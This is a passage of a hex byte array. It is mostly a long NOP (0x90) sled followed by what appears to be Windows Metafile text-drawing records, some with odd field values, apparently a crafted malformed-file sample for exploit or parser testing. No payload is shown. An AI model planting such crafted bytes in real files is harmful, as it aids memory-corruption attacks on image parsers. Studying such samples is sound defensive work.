0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x00, + 0x09, 0x00, 0x04, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, + 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA5, 0x01, + 0x2A, 0x00, 0x09, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00, + 
0x0A, 0xFB, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x09, 0x00, 0x07, 0x00, 0x09, 0x00, + 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, + 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x8A, + 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x70, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0x2A, 0x00, + 0x0C, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77, + 0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0C, 0x00, + 0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, + 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, + 0x32, 0x0A, 0xBB, 0x01, 0xA3, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, + 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, + 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, + 0x01, 0x00, 0x25, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0xA9, 0x00, 0x14, 0x00, 0x00, 0x00, + 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, + 0x77, 0x77, 0x77, 0x20, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, + 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, + 0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 
0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, + 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, + 0x04, 0xBE, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, + 0x3D, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xD1, 0x01, 0x2A, 0x00, 0x24, 0x00, 0x00, 0x00, 0x49, 0x20, + 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x42, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, + 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, + 0x42, 0x20, 0x07, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x09, 0x00, + 0x05, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, + 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00, + 0x06, 0x00, 0x04, 0x00, 0x0E, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, + 0x0A, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, + 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, + 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, + 0x00, 0x00, 0x32, 0x0A, 0xE8, 0x01, 0x2A, 0x00, 0x01, 0x00, 0x00, 0x00, 